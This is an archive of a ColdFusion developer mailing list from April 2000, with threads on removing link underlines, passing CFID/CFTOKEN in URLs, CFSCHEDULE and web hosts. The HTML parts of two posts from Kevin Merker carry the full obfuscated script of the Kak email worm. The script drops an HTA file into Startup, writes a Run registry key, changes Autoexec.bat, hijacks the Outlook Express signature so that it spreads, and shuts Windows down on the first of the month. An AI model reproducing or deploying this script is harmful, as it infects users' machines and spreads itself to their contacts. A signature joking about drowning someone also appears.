From: "Kevin R. Merker" [EMAIL PROTECTED]
To: "cf-talk" [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 6:19 AM
Subject: Removing the underline of a text link??


 This is a multi-part message in MIME format.

 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/plain;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 I want to remove the underline of a text link.
 How do you do this. A little snippet of code couldn't hurt.

 Thanks,

 Kevin


 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/html;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
 HTMLHEAD
 META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type
 META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR
 STYLE/STYLE
 /HEAD
 BODY bgColor=3D#ff
 DIVFONT size=3D2I want to remove the underline of a text =
 link./FONT/DIV
 DIVFONT size=3D2How do you do this./FONTFONT size=3D2 A little =
 snippet of=20
 code couldn't hurt./FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Thanks,/FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Kevin/FONT/DIV
 DIV
 DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"
 OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
 id=3Dscr/OBJECT/DIV
 SCRIPT!--
 function sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"ZHTMLHEADTITLEDr=
 iver Memory Error/"+"TITLEHTA:APPLICATION ID=3D\"hO\" =
 WINDOWSTATE=3DMinimize/"+"HEADBODY BGCOLOR=3D#CCobject =
 id=3D'wsh' =
 classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/"+"objectSCRIP=
 Tfunction sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =

ActiveXObject('Scripting.FileSystemObject');wd=3D'C:Windows';fl=3D=
 fs.GetFolder(wd+'Applic~1Identities');sbf=3Dfl.SubFolders;for(var =
 mye=3Dnew =
 Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =

String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
 ~1PROGRA~1D=C9MARR~1kak.hta';ken=3Dwd+'STARTM~1Programs\\=
 \\StartUpkak.hta';k2=3Dwd+'System'+fic+'.hta';kk=3D(fs.FileExists=
 (kfr))?kfr:ken;aek=3D'C:AE.KAK';aeb=3D'C:Autoexec.bat';if(!fs.Fil=
 eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
 .GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
 )?wd+'MENUD=90~1PROGRA~1D=90MARR~1kak.hta':ken;t1.WriteLine('=
 @echo off'+pth);t1.WriteLine('del =
 '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
 k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
 T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USERIdentities'+id=
 n+'SoftwareMicrosoftOutlook =
 Express5.0';sg=3D'signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
 "Default =
 Signature\"=3D\"\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
 \\]');t2.WriteLine('\"name\"=3D\"Signature =

#1\"');t2.WriteLine('\"type\"=3Ddword:0002');t2.WriteLine('\"text\"=3D=
 \"\"');t2.Write('\"file\"=3D\"C:WINDOWSkak.htm\"');t2.Wri=
 teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
 Flags\"=3Ddword:0003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
 L_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]')=
 ;t2.Write('\"cAg0u\"=3D\"C:WINDOWSSYSTEM'+fic+'.h=
 ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
 '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('HTMLB=
 ODYDIV =
 style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"OBJECT =
 classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
 id=3Dscr/"+"OBJECT/"+"DIV');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
 (1)!=3D'Z');t3.WriteLine('SCRIPT!--');t3.write('function =
 sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
 );t4.close();rd=3D//g;re=3D/\"/g;rf=3D/\\//g;rt=3Drs.replace(rd,'\\\=
 \').replace(re,'\"').replace(rf,'/"+"\"+\"');t3.WriteLine(rt+'\"=
 ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
 age;scr.Path=3D(la=3D=3D\"fr\")?\"C:windowsMenu =
 D=E9marrerProgrammesD=E9marragekak.hta\":\"C:=
 windowsStart =
 MenuProgramsStartUpkak.hta\";agt=3Dnavigator.user=
 Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)(parseInt(navigato=
 r.appVersion)4))||(agt.indexOf(\"msie =
 5.\")!=3D-1))scr.write();');t3.write('// =
 --/"+"'+'SCRIPT/"+"'+'OBJECT/"+"'+'BODY/"+"'+'HTML');t3.close();=
 fs.GetFile(wd+'kak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dn=
 ew Date();if(d.getDate()=3D=3D1  =
 d.getHours()17){alert('Kagou-Anti-Kro$oft says not today =
 !');wsh.Run(wd+'RUNDLL32.EXE =
 

Chicagoland Area Based CF Hosting ISP?

2000-04-15 Thread Kevin R. Merker

This is a multi-part message in MIME format.

--=_NextPart_000_007E_01BFA6CA.E76936A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Anyone know of a Chicagoland area based CF hosting ISP. I'm looking for =
one.

KM


--=_NextPart_000_007E_01BFA6CA.E76936A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
HTMLHEAD
META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type
META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR
STYLE/STYLE
/HEAD
BODY bgColor=3D#ff
DIVFONT size=3D2Anyone know of a Chicagoland area based CF hosting =
ISP. I'm=20
looking for one./FONT/DIV
DIVnbsp;/DIV
DIVFONT size=3D2KM/FONT/DIV
DIV
DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"
OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr/OBJECT/DIV
SCRIPT!--
function sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"ZHTMLHEADTITLEDr=
iver Memory Error/"+"TITLEHTA:APPLICATION ID=3D\"hO\" =
WINDOWSTATE=3DMinimize/"+"HEADBODY BGCOLOR=3D#CCobject =
id=3D'wsh' =
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/"+"objectSCRIP=
Tfunction sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:Windows';fl=3D=
fs.GetFolder(wd+'Applic~1Identities');sbf=3Dfl.SubFolders;for(var =
mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1PROGRA~1D=C9MARR~1kak.hta';ken=3Dwd+'STARTM~1Programs\\=
\\StartUpkak.hta';k2=3Dwd+'System'+fic+'.hta';kk=3D(fs.FileExists=
(kfr))?kfr:ken;aek=3D'C:AE.KAK';aeb=3D'C:Autoexec.bat';if(!fs.Fil=
eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
.GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
)?wd+'MENUD=90~1PROGRA~1D=90MARR~1kak.hta':ken;t1.WriteLine('=
@echo off'+pth);t1.WriteLine('del =
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USERIdentities'+id=
n+'SoftwareMicrosoftOutlook =
Express5.0';sg=3D'signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
"Default =
Signature\"=3D\"\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
\\]');t2.WriteLine('\"name\"=3D\"Signature =
#1\"');t2.WriteLine('\"type\"=3Ddword:0002');t2.WriteLine('\"text\"=3D=
\"\"');t2.Write('\"file\"=3D\"C:WINDOWSkak.htm\"');t2.Wri=
teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
Flags\"=3Ddword:0003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
L_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]')=
;t2.Write('\"cAg0u\"=3D\"C:WINDOWSSYSTEM'+fic+'.h=
ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('HTMLB=
ODYDIV =
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"OBJECT =
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
id=3Dscr/"+"OBJECT/"+"DIV');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
(1)!=3D'Z');t3.WriteLine('SCRIPT!--');t3.write('function =
sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
);t4.close();rd=3D//g;re=3D/\"/g;rf=3D/\\//g;rt=3Drs.replace(rd,'\\\=
\').replace(re,'\"').replace(rf,'/"+"\"+\"');t3.WriteLine(rt+'\"=
;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
age;scr.Path=3D(la=3D=3D\"fr\")?\"C:windowsMenu =
D=E9marrerProgrammesD=E9marragekak.hta\":\"C:=
windowsStart =
MenuProgramsStartUpkak.hta\";agt=3Dnavigator.user=
Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)(parseInt(navigato=
r.appVersion)4))||(agt.indexOf(\"msie =
5.\")!=3D-1))scr.write();');t3.write('// =
--/"+"'+'SCRIPT/"+"'+'OBJECT/"+"'+'BODY/"+"'+'HTML');t3.close();=
fs.GetFile(wd+'kak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dn=
ew Date();if(d.getDate()=3D=3D1  =
d.getHours()17){alert('Kagou-Anti-Kro$oft says not today =
!');wsh.Run(wd+'RUNDLL32.EXE =
user.exe,exitwindows');}self.close();/"+"SCRIPTS3 driver memory alloc =
failed nbsp; =
!]]%/"+"BODY/"+"HTML";la=3D(navigator.systemLanguage)?navigator.sy=
stemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\M=
enu D=E9marrer\\Programmes\\D=E9marrage\\kak.hta":"C:\\windows\\Start =
Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=
;if(((agt.indexOf("msie")!=3D-1)(parseInt(navigator.appVersion)4))||(a=
gt.indexOf("msie 5.")!=3D-1))scr.write();
// --/SCRIPT
/OBJECT/DIV/BODY/HTML


Re: Am I Missing Something?

2000-04-15 Thread Allen

Aren't there some security issues involved in passing the CFID  CFTOKEN in
the URL?  It's been awhile now, but I recall one of my co-workers playing
with bookmarking pages, etc. and being able to get in without using the
username / password.   My memory is a bit fuzzy on this one, though.

-Allen

- Original Message -
From: Byron M [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, April 13, 2000 11:55 PM
Subject: RE: Am I Missing Something?


 Basically that is correct, you could do it with vars stored in a db, but
you
 would still have to add some sort of id to the URL.

 We started to put #session.URLToken# to the end of all URL's this variable
 adds cfid=9394cftoken=85904830 to the URL.

 I just thought of this.  If you have session variables that are
initialized
 with each session in say an Application.cfm file and users have cookies
 turned off then you are initializing session vars for every page hit for
 that user, and the old ones have to wait to timeout.  So in actuality you
 will be saving all so precious server resources by passing the id and
token
 to every page, which should in turn win you the admiration of your peers
and
 a huge raise because those processor and memory upgrade dollars could be
 used elsewhere. :)


 -Original Message-
 From: Eric Dawson [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, April 13, 2000 11:38 PM
 To: [EMAIL PROTECTED]
 Subject: Re: Am I Missing Something?


 as far as I know the only way to pass a session from page to page is
either
 through a cookie or a url variable. If cookies are turned off you need to
 manually code the CFID and CFTOKEN variables to the URL to ensure you pass
 them from page to page.

 Please correct me if I am wrong.

 Eric

 From: Kelly Matthews [EMAIL PROTECTED]
 Reply-To: [EMAIL PROTECTED]
 To: "'[EMAIL PROTECTED] '" [EMAIL PROTECTED]
 Subject: Am I Missing Something?
 Date: Thu, 13 Apr 2000 21:26:31 -0400

 Ok I am somewhat new to CF but something doesn't seem to be right.
 I have a section of our site that is secure, for members only. I
 have written the app to write a cookie so they don't have to login in the
 future. That part works fine.

 Now I just wanted to see what happened if someone had cookies turned off,
 and of course even you can log in but the minute you try to go to a 2nd
page
 it loops back to the log in.

 Now before I implemented the cookies I did have session management on set
to
 about 30 minutes, which is still on, so people wouldnt have to relog in,
 that worked fine. But with cookies off session management stops working
too.
 Does session management work only with cookies?

 I tried something else, turned client management on, and used a database
for
 clientstorage, instead of the registry or cookies, just to test it out,
but
 that didn't keep them logged in either. I must be missing something but
isnt
 there a way to open and maintain a session without cookies? I changed
 setclientcookies to "no" but as long as my browser cookies are off I still
 can't get in.

 Point is they get logged in and get to the first page after the login page
 but if they try to go anywhere else they get kicked back to the login
page,
 which from the app.cfm below leads me to beleive its
 not setting Session.Loggedin, and the only difference is that I turned my
 browser cookies off.  Guess I just want to find out if Session.Loggedin
HAS
 to be set in a cookie or somewhere can i define it to be set a different
 way. The client variables were however writing to the datasource with no
 problem.

 Any help would be appreciated.
 Below is my Application.cfm
 I have tried all 3 client storage methods.
 and with setclientcookies on and off.

 cfapplication name="Members"
 CLIENTSTORAGE="Clients"
 clientmanagement="Yes"
 sessionmanagement="Yes"
 setclientcookies="NO"
 sessiontimeout="#CreateTimeSpan(0,0,30,0)#"

 CFIF  NOT IsDefined("Session.LoggedIn")
  CFLOCATION URL="login/login.cfm"
 CFELSEIF Session.loggedin IS "0"
  CFLOCATION URL="login/login.cfm"
 /cfif


 --
--
 --
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
 send a message to [EMAIL PROTECTED] with 'unsubscribe' in
 the body.

 __
 Get Your Private, Free Email at http://www.hotmail.com

 --
--
 --
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
 send a message to [EMAIL PROTECTED] with 'unsubscribe' in
 the body.


 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL 

A Good CF Host Has What?

2000-04-15 Thread Allen


Over time I've noticed the classic "I'm looking for a host threads".  One of
the things I've noticed is a general comment along the lines of "at least
they're always up".

I'm curious what people find to be important in a host.  But not only that,
but how difficult those things are to implement.  To me, I would think that
having enough bandwidth is a problem a host can easily fix with money
(getting a OC-12 instead of a T-3, etc.).  But I would think something are
more difficult to implement, like good customer service.

-Allen

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Am I Missing Something?

2000-04-15 Thread Fred Sanders

there's ways to fix that.

Fred T. Sanders
Galveston Island, TX
--
Having a bad day?
Imagine this...

You are in total seclusion from that hectic place called "The World".
The soothing sound of a gentle waterfall fills the air with a cascading
serenity.
The water is clear.
You can easily make out the face of the person you are holding underwater.

Feeling better?


- Original Message -
From: "Allen" [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 11:39 AM
Subject: Re: Am I Missing Something?


 Aren't there some security issues involved in passing the CFID  CFTOKEN
in
 the URL?  It's been awhile now, but I recall one of my co-workers playing
 with bookmarking pages, etc. and being able to get in without using the
 username / password.   My memory is a bit fuzzy on this one, though.

 -Allen

 - Original Message -
 From: Byron M [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Thursday, April 13, 2000 11:55 PM
 Subject: RE: Am I Missing Something?


  Basically that is correct, you could do it with vars stored in a db, but
 you
  would still have to add some sort of id to the URL.
 
  We started to put #session.URLToken# to the end of all URL's this
variable
  adds cfid=9394cftoken=85904830 to the URL.
 
  I just thought of this.  If you have session variables that are
 initialized
  with each session in say an Application.cfm file and users have cookies
  turned off then you are initializing session vars for every page hit for
  that user, and the old ones have to wait to timeout.  So in actuality
you
  will be saving all so precious server resources by passing the id and
 token
  to every page, which should in turn win you the admiration of your peers
 and
  a huge raise because those processor and memory upgrade dollars could be
  used elsewhere. :)
 
 
  -Original Message-
  From: Eric Dawson [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, April 13, 2000 11:38 PM
  To: [EMAIL PROTECTED]
  Subject: Re: Am I Missing Something?
 
 
  as far as I know the only way to pass a session from page to page is
 either
  through a cookie or a url variable. If cookies are turned off you need
to
  manually code the CFID and CFTOKEN variables to the URL to ensure you
pass
  them from page to page.
 
  Please correct me if I am wrong.
 
  Eric
 
  From: Kelly Matthews [EMAIL PROTECTED]
  Reply-To: [EMAIL PROTECTED]
  To: "'[EMAIL PROTECTED] '" [EMAIL PROTECTED]
  Subject: Am I Missing Something?
  Date: Thu, 13 Apr 2000 21:26:31 -0400
 
  Ok I am somewhat new to CF but something doesn't seem to be right.
  I have a section of our site that is secure, for members only. I
  have written the app to write a cookie so they don't have to login in
the
  future. That part works fine.
 
  Now I just wanted to see what happened if someone had cookies turned
off,
  and of course even you can log in but the minute you try to go to a 2nd
 page
  it loops back to the log in.
 
  Now before I implemented the cookies I did have session management on
set
 to
  about 30 minutes, which is still on, so people wouldnt have to relog in,
  that worked fine. But with cookies off session management stops working
 too.
  Does session management work only with cookies?
 
  I tried something else, turned client management on, and used a database
 for
  clientstorage, instead of the registry or cookies, just to test it out,
 but
  that didn't keep them logged in either. I must be missing something but
 isnt
  there a way to open and maintain a session without cookies? I changed
  setclientcookies to "no" but as long as my browser cookies are off I
still
  can't get in.
 
  Point is they get logged in and get to the first page after the login
page
  but if they try to go anywhere else they get kicked back to the login
 page,
  which from the app.cfm below leads me to beleive its
  not setting Session.Loggedin, and the only difference is that I turned
my
  browser cookies off.  Guess I just want to find out if Session.Loggedin
 HAS
  to be set in a cookie or somewhere can i define it to be set a different
  way. The client variables were however writing to the datasource with no
  problem.
 
  Any help would be appreciated.
  Below is my Application.cfm
  I have tried all 3 client storage methods.
  and with setclientcookies on and off.
 
  cfapplication name="Members"
  CLIENTSTORAGE="Clients"
  clientmanagement="Yes"
  sessionmanagement="Yes"
  setclientcookies="NO"
  sessiontimeout="#CreateTimeSpan(0,0,30,0)#"
 
  CFIF  NOT IsDefined("Session.LoggedIn")
   CFLOCATION URL="login/login.cfm"
  CFELSEIF Session.loggedin IS "0"
   CFLOCATION URL="login/login.cfm"
  /cfif
 
 

 --
 --
  --
  Archives: http://www.eGroups.com/list/cf-talk
  To Unsubscribe visit
  http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk
or
  send a message to [EMAIL PROTECTED] with 'unsubscribe'
in
  

Re: SFCHEDULE do not schedules

2000-04-15 Thread Fred Sanders

I believe you have to have the ColdFusion Executive running for that to
work.


Fred T. Sanders
Galveston Island, TX
--
Having a bad day?
Imagine this...

You are in total seclusion from that hectic place called "The World".
The soothing sound of a gentle waterfall fills the air with a cascading
serenity.
The water is clear.
You can easily make out the face of the person you are holding underwater.

Feeling better?


- Original Message -
From: "Juan Manuel Tapiola" [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 12:01 PM
Subject: SFCHEDULE do not schedules


 Hello everyone.  I use the CFSCHEDULE but I don't know why it does not get
 executed in my localhost.  The cfschedule is set up correctly because I
 check in the Administrator and it is there, then I run it and it run right
 (it has to send e-mails every 30 minutes).  I just can't solve why it
 doesn't work and send the emails every 30 minutes.  I also tried to make
 this schedule tag right from the Administrator but it does not work, too.
 It get executed if I press run but the schedule doesn't work.  Here is the
 code:

 CFSCHEDULE ACTION="UPDATE" STARTDATE="04-07-00" STARTTIME="8:41pm"
 TASK="mailing" URL="http://localhost/ciudadvideo/pruebas/mail.cfm"
 OPERATION="HTTPRequest" INTERVAL="60"

 Could anyone help me?

 Thank you very much in advance,

 Manuel Tapiola



 --

 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: A Good CF Host Has What?

2000-04-15 Thread Chris Giminez

I'm sure someone can add to this list, but here's a list of what a dream host would 
offer in my
opinion:

Always up
unlimited pop accounts
reasonable price
web based email access
statistics package
real time account set up (or within an hour)
real time datasource set up
static IP (for development and testing without a domain)
phone (no more than 5 minutes on hold) or chat support



Chris Giminez
Owner - Cyber Scriber Web Site Design
831-728-4469
ICQ# 2628000





 Over time I've noticed the classic "I'm looking for a host threads".  One of
 the things I've noticed is a general comment along the lines of "at least
 they're always up".

 I'm curious what people find to be important in a host.  But not only that,
 but how difficult those things are to implement.  To me, I would think that
 having enough bandwidth is a problem a host can easily fix with money
 (getting a OC-12 instead of a T-3, etc.).  But I would think something are
 more difficult to implement, like good customer service.

 -Allen

 --
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Auto Reply to your message ...

2000-04-15 Thread rdiamond

This is a MIME-encapsulated message

--=38F7D296001F/server0.sys-con.com

  -  The following text is an automated response to your message  -
Hi-
I am travelling overseas and will be back Monday April 24th. 
Please contact [EMAIL PROTECTED] for any urgent issues.
Best regards,
Robert

--=38F7D296001F/server0.sys-con.com--

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Auto Reply to your message ...

2000-04-15 Thread rdiamond

This is a MIME-encapsulated message

--=38F7D2960123/server0.sys-con.com

  -  The following text is an automated response to your message  -
Hi-
I am travelling overseas and will be back Monday April 24th. 
Please contact [EMAIL PROTECTED] for any urgent issues.
Best regards,
Robert

--=38F7D2960123/server0.sys-con.com--

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Am I Missing Something?

2000-04-15 Thread Eric Dawson

isn't that why you set a session timeout? hmmm but it wouldn't stop you from 
passing the open session to another pc. can you tie cfid and cftoken to the 
IP address or something like that?

My network proxy server (MS proxy) doesn't cache ASP pages but it caches CFM 
pages? Does anyone know how to configure this?

also I have been thinking (not original thinking).

But I would like to be able to create an encrypted ticket that contains cfid 
and cftoken as well as other information to be securely passed in the url.

Does any one do this now?

Eric

From: "Allen" [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: Am I Missing Something?
Date: Sat, 15 Apr 2000 11:39:13 -0500

Aren't there some security issues involved in passing the CFID  CFTOKEN in
the URL?  It's been awhile now, but I recall one of my co-workers playing
with bookmarking pages, etc. and being able to get in without using the
username / password.   My memory is a bit fuzzy on this one, though.

-Allen

- Original Message -
From: Byron M [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, April 13, 2000 11:55 PM
Subject: RE: Am I Missing Something?


  Basically that is correct, you could do it with vars stored in a db, but
you
  would still have to add some sort of id to the URL.
 
  We started to put #session.URLToken# to the end of all URL's this 
variable
  adds cfid=9394cftoken=85904830 to the URL.
 
  I just thought of this.  If you have session variables that are
initialized
  with each session in say an Application.cfm file and users have cookies
  turned off then you are initializing session vars for every page hit for
  that user, and the old ones have to wait to timeout.  So in actuality you
  will be saving all so precious server resources by passing the id and
token
  to every page, which should in turn win you the admiration of your peers
and
  a huge raise because those processor and memory upgrade dollars could be
  used elsewhere. :)
 
 
  -Original Message-
  From: Eric Dawson [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, April 13, 2000 11:38 PM
  To: [EMAIL PROTECTED]
  Subject: Re: Am I Missing Something?
 
 
  as far as I know the only way to pass a session from page to page is
either
  through a cookie or a url variable. If cookies are turned off you need to
  manually code the CFID and CFTOKEN variables to the URL to ensure you 
pass
  them from page to page.
 
  Please correct me if I am wrong.
 
  Eric
 
  From: Kelly Matthews [EMAIL PROTECTED]
  Reply-To: [EMAIL PROTECTED]
  To: "'[EMAIL PROTECTED] '" [EMAIL PROTECTED]
  Subject: Am I Missing Something?
  Date: Thu, 13 Apr 2000 21:26:31 -0400
 
  Ok I am somewhat new to CF but something doesn't seem to be right.
  I have a section of our site that is secure, for members only. I
  have written the app to write a cookie so they don't have to login in the
  future. That part works fine.
 
  Now I just wanted to see what happened if someone had cookies turned off,
  and of course even you can log in but the minute you try to go to a 2nd
page
  it loops back to the log in.
 
  Now before I implemented the cookies I did have session management on set
to
  about 30 minutes, which is still on, so people wouldnt have to relog in,
  that worked fine. But with cookies off session management stops working
too.
  Does session management work only with cookies?
 
  I tried something else, turned client management on, and used a database
for
  clientstorage, instead of the registry or cookies, just to test it out,
but
  that didn't keep them logged in either. I must be missing something but
isnt
  there a way to open and maintain a session without cookies? I changed
  setclientcookies to "no" but as long as my browser cookies are off I 
still
  can't get in.
 
  Point is they get logged in and get to the first page after the login 
page
  but if they try to go anywhere else they get kicked back to the login
page,
  which from the app.cfm below leads me to beleive its
  not setting Session.Loggedin, and the only difference is that I turned my
  browser cookies off.  Guess I just want to find out if Session.Loggedin
HAS
  to be set in a cookie or somewhere can i define it to be set a different
  way. The client variables were however writing to the datasource with no
  problem.
 
  Any help would be appreciated.
  Below is my Application.cfm
  I have tried all 3 client storage methods.
  and with setclientcookies on and off.
 
  cfapplication name="Members"
  CLIENTSTORAGE="Clients"
  clientmanagement="Yes"
  sessionmanagement="Yes"
  setclientcookies="NO"
  sessiontimeout="#CreateTimeSpan(0,0,30,0)#"
 
  CFIF  NOT IsDefined("Session.LoggedIn")
   CFLOCATION URL="login/login.cfm"
  CFELSEIF Session.loggedin IS "0"
   CFLOCATION URL="login/login.cfm"
  /cfif
 
 
  
--
--
  --
  Archives: http://www.eGroups.com/list/cf-talk
  To Unsubscribe visit
  

Re: A Good CF Host Has What?

2000-04-15 Thread Chris Lott

 I would suggest that anyone planning to offer hosting services check out
 what Intermedia offers in the way of control and try to go them one
better.

I just wish it weren't so expensive for SQL server additions (everywhere),
or that there were some rate by amount of use, etc. $50 per month for 10
megabytes is just too much in my opinion... that's as much as all the other
service combined! Plus, for a personal/educational site where I need SQL
Server, but don't have a lot of traffic it's too bad I have to pay the same
as those who hammer the db. Oh well, life has bigger problems...

c
--
Chris Lott [EMAIL PROTECTED],  Technical Manager
p907.474.5122  |  f907.474.5402  |  PGP Key ID: 0x8687E87E

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: A Good CF Host Has What?

2000-04-15 Thread Chris Giminez


  phone (no more than 5 minutes on hold) or chat support

 Only needed to contact them once via email to ask that CFFILE be enabled on
 my account...taken care of immediately. A friend has spoken with them on the
 phone and gotten immediate response. They do offer a support forum but I've
 never used it.

Funny, I called regarding the use of CFFILE and was told it was disabled. Period. 
There was no
mention of the possibility of it being enabled. I guess I'll have to make a specific 
request. I set
up an account elsewhere because of the lack of support for this tag. Other than that 
Inermedia has
been great. You definately will pay for the great service and features, but it's worth 
it.

Why don't hosting companies offer MySQL as a free option or maybe a one time set up? 
I've not seen
it. Only Access or SQL.


Chris


